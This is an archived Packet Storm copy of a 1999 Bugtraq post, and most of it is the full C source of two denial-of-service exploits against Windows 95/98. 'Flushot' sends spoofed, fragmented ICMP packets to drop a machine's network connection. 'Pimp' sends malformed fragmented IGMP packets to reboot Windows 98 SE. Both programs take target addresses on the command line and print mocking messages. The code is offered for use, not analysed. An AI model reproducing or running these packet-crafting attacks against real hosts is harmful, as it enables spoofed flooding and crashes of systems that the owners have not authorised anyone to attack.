exploit the possibilities

windows_exploits.txt

windows_exploits.txt
Posted Sep 21, 1999

Two exploits for windows 95/98 : one to drop a network connection and the other to reboot windows 98se

tags | exploit
systems | windows
MD5 | d8c319f7b5559cb1a6e2da3f68a46284

windows_exploits.txt

Change Mirror Download
Subject:      About IGMP and another exploit for Windows95x/98x
To: BUGTRAQ@SECURITYFOCUS.COM


I got two exploit and test it...


- The first one is Flushot by DarkShow. This exploit can drop the network connection in windows 95 and 98(First Edition)


- The other one is Pimp by Rob Mosher, this exploit can reboot Windows98se


I have Rethat linux 5.0 installed....


Now... the exploits..


Sorry.. my english is a shit...


Have fun..


----------[FluSHOT.c START CUT HERE]--------------------------------------------------
/* Lags CPU Made By DarkShadow from The flu Hacking Group


Kills Win95-98 machines


*/




#include <stdio.h>


#include <unistd.h>


#include <stdlib.h>


#include <string.h>


#include <sys/types.h>


#include <sys/time.h>


#include <sys/socket.h>


#include <netdb.h>


#include <netinet/in.h>


#include <netinet/ip.h>


#include <netinet/ip_icmp.h>


void banner(void) {





printf("Remote Flushot v 1.0\n\n");








printf("\n\n");


}


void usage(const char *progname) {


printf(" usage:\n");


printf("./flushot [Spoofed IP] [Destination IP] [# of FLushot to Send]\n",progname);


printf(" [Spoofed IP] : ex: 205.56.78.0\n");


printf(" [Destination IP] : ex: 201.12.3.76\n");


printf(" [# of FLushot to Send] : 100\n");


printf("The Flu Hacking Group (c)\n");


printf("DarkShadow PlimoMan Hack The Planet\n");


}


int resolve( const char *name, unsigned int port, struct sockaddr_in *addr ) {


struct hostent *host;


memset(addr,0,sizeof(struct sockaddr_in));


addr->sin_family = AF_INET;


addr->sin_addr.s_addr = inet_addr(name);


if (addr->sin_addr.s_addr == -1) {


if (( host = gethostbyname(name) ) == NULL ) {


fprintf(stderr,"ERROR: Unable to resolve host %s\n",name);


return(-1);


}


addr->sin_family = host->h_addrtype;


memcpy((caddr_t)&addr->sin_addr,host->h_addr,host->h_length);


}


addr->sin_port = htons(port);


return(0);


}


unsigned short in_cksum(addr, len)


u_short *addr;


int len;


{


register int nleft = len;


register u_short *w = addr;


register int sum = 0;


u_short answer = 0;




while (nleft > 1) {


sum += *w++;


nleft -= 2;


}




if (nleft == 1) {


*(u_char *)(&answer) = *(u_char *)w ;


sum += answer;


}




sum = (sum >> 16) + (sum & 0xffff);


sum += (sum >> 16);


answer = ~sum;


return(answer);


}


int send_winbomb(int socket,


unsigned long spoof_addr,


struct sockaddr_in *dest_addr) {


unsigned char *packet;


struct iphdr *ip;


struct icmphdr *icmp;


int rc;




packet = (unsigned char *)malloc(sizeof(struct iphdr) +


sizeof(struct icmphdr) + 8);


ip = (struct iphdr *)packet;


icmp = (struct icmphdr *)(packet + sizeof(struct iphdr));


memset(ip,0,sizeof(struct iphdr) + sizeof(struct icmphdr) + 8);


ip->ihl = 5;


ip->version = 4;


// ip->tos = 2;


ip->id = htons(1234);


ip->frag_off |= htons(0x2000);


// ip->tot_len = 0;


ip->ttl = 30;


ip->protocol = IPPROTO_ICMP;


ip->saddr = spoof_addr;


ip->daddr = dest_addr->sin_addr.s_addr;


ip->check = in_cksum(ip, sizeof(struct iphdr));




icmp->type = 12;


icmp->code = 0;


icmp->checksum = in_cksum(icmp,sizeof(struct icmphdr) + 1);


if (sendto(socket,


packet,


sizeof(struct iphdr) +


sizeof(struct icmphdr) + 1,0,


(struct sockaddr *)dest_addr,


sizeof(struct sockaddr)) == -1) { return(-1); }


ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + 8);


ip->frag_off = htons(8 >> 3);


ip->frag_off |= htons(0x2000);


ip->check = in_cksum(ip, sizeof(struct iphdr));


icmp->type = 0;


icmp->code = 0;


icmp->checksum = 0;


if (sendto(socket,


packet,


sizeof(struct iphdr) +


sizeof(struct icmphdr) + 8,0,


(struct sockaddr *)dest_addr,


sizeof(struct sockaddr)) == -1) { return(-1); }


free(packet);


return(0);


}


int main(int argc, char * *argv) {


struct sockaddr_in dest_addr;


unsigned int i,sock;


unsigned long src_addr;


banner();


if ((argc != 4)) {


usage(argv[0]);


return(-1);


}




if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {


fprintf(stderr,"ERROR: Opening raw socket.\n");


return(-1);


}




if (resolve(argv[1],0,&dest_addr) == -1) { return(-1); }


src_addr = dest_addr.sin_addr.s_addr;


if (resolve(argv[2],0,&dest_addr) == -1) { return(-1); }


printf("Status: Connected....packets sent.\n",argv[0]);


for (i = 0;i < atoi(argv[3]);i++) {


if (send_winbomb(sock,


src_addr,


&dest_addr) == -1) {


fprintf(stderr,"ERROR: Unable to Connect To luser.\n");


return(-1);


}


usleep(10000);


}


}



----------[FluSHOT.c END CUT HERE]--------------------------------------------------
----------[Pimp.c START CUT HERE]--------------------------------------------------
/*
** pimp.c 6/4/99 by Rob Mosher: nyt@deadpig.org
** exploits bug in m$'s ip stack
** rewrite by nyt@EFnet
** bug found by klepto
** usage: pimp <host>
*/


#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <time.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <sys/socket.h>


struct igmp
{
unsigned char igmp_type;
unsigned char igmp_code;
unsigned short igmp_cksum;
struct in_addr igmp_group;
};


#define ERROR(a) {printf("ERROR: %s\n", a);exit(-1);}


u_long resolve(char *);


int main(int argc, char *argv[])
{
int nsock, ctr;
char *pkt, *data;
struct ip *nip;
struct igmp *nigmp;
struct sockaddr_in s_addr_in;


setvbuf(stdout, NULL, _IONBF, 0);


printf("pimp.c by nyt\n");


if(argc != 2)
ERROR("usage: pimp <host>");


if((nsock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1)
ERROR("could not create raw socket");


pkt = malloc(1500);
if(!pkt)
ERROR("could not allocate memory");


memset(&s_addr_in, 0, sizeof(s_addr_in));
memset(pkt, 0, 1500);


nip = (struct ip *) pkt;
nigmp = (struct igmp *) (pkt + sizeof(struct ip));
data = (char *)(pkt + sizeof(struct ip) + sizeof(struct igmp));
memset(data, 'A', 1500-(sizeof(struct ip) + sizeof(struct igmp)));


s_addr_in.sin_addr.s_addr = resolve(argv[1]);


nip->ip_v = 4;
nip->ip_hl = 5;
nip->ip_tos = 0;
nip->ip_id = 69;
nip->ip_ttl = 255;
nip->ip_p = IPPROTO_IGMP;
nip->ip_sum = 0;
nip->ip_dst.s_addr = s_addr_in.sin_addr.s_addr;
nip->ip_src.s_addr = 2147100000;
nigmp->igmp_type = 2;
nigmp->igmp_code = 31;
nigmp->igmp_cksum = 0;


inet_aton("128.1.1.1", &nigmp->igmp_group);


printf("pimpin' dem trick-ass-bitches");


for(ctr = 0;ctr < 15;ctr++)
{
printf(".");
nip->ip_len = 1500;
nip->ip_off = htons(IP_MF);
sendto(nsock, pkt, 1500, 0, (struct sockaddr *) &s_addr_in,
sizeof(s_addr_in));


nip->ip_off = htons(1480/8)|htons(IP_MF);
sendto(nsock, pkt, 1500, 0, (struct sockaddr *) &s_addr_in,
sizeof(s_addr_in));


nip->ip_off = htons(5920/8)|htons(IP_MF);
sendto(nsock, pkt, 1500, 0, (struct sockaddr *) &s_addr_in,
sizeof(s_addr_in));


nip->ip_len = 831;
nip->ip_off = htons(7400/8);
sendto(nsock, pkt, 831, 0, (struct sockaddr *) &s_addr_in,
sizeof(s_addr_in));


usleep(500000);
}


printf("*slap* *slap* bitch, who yo daddy\n");
shutdown(nsock, 2);
close(nsock);
}


u_long resolve(char *host)
{
struct hostent *he;
u_long ret;


if(!(he = gethostbyname(host)))
{
herror("gethostbyname()");
exit(-1);
}
memcpy(&ret, he->h_addr, sizeof(he->h_addr));
return ret;
}


----------[Pimp.c END CUT HERE]--------------------------------------------------



-- Hector Leon --
darksun@computer-maniacs.com
--CiMOS Computers Rep. Dom.--
Login or Register to add favorites

File Archive:

January 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    2 Files
  • 2
    Jan 2nd
    0 Files
  • 3
    Jan 3rd
    20 Files
  • 4
    Jan 4th
    4 Files
  • 5
    Jan 5th
    37 Files
  • 6
    Jan 6th
    20 Files
  • 7
    Jan 7th
    4 Files
  • 8
    Jan 8th
    0 Files
  • 9
    Jan 9th
    0 Files
  • 10
    Jan 10th
    18 Files
  • 11
    Jan 11th
    8 Files
  • 12
    Jan 12th
    19 Files
  • 13
    Jan 13th
    31 Files
  • 14
    Jan 14th
    2 Files
  • 15
    Jan 15th
    2 Files
  • 16
    Jan 16th
    2 Files
  • 17
    Jan 17th
    18 Files
  • 18
    Jan 18th
    0 Files
  • 19
    Jan 19th
    0 Files
  • 20
    Jan 20th
    0 Files
  • 21
    Jan 21st
    0 Files
  • 22
    Jan 22nd
    0 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close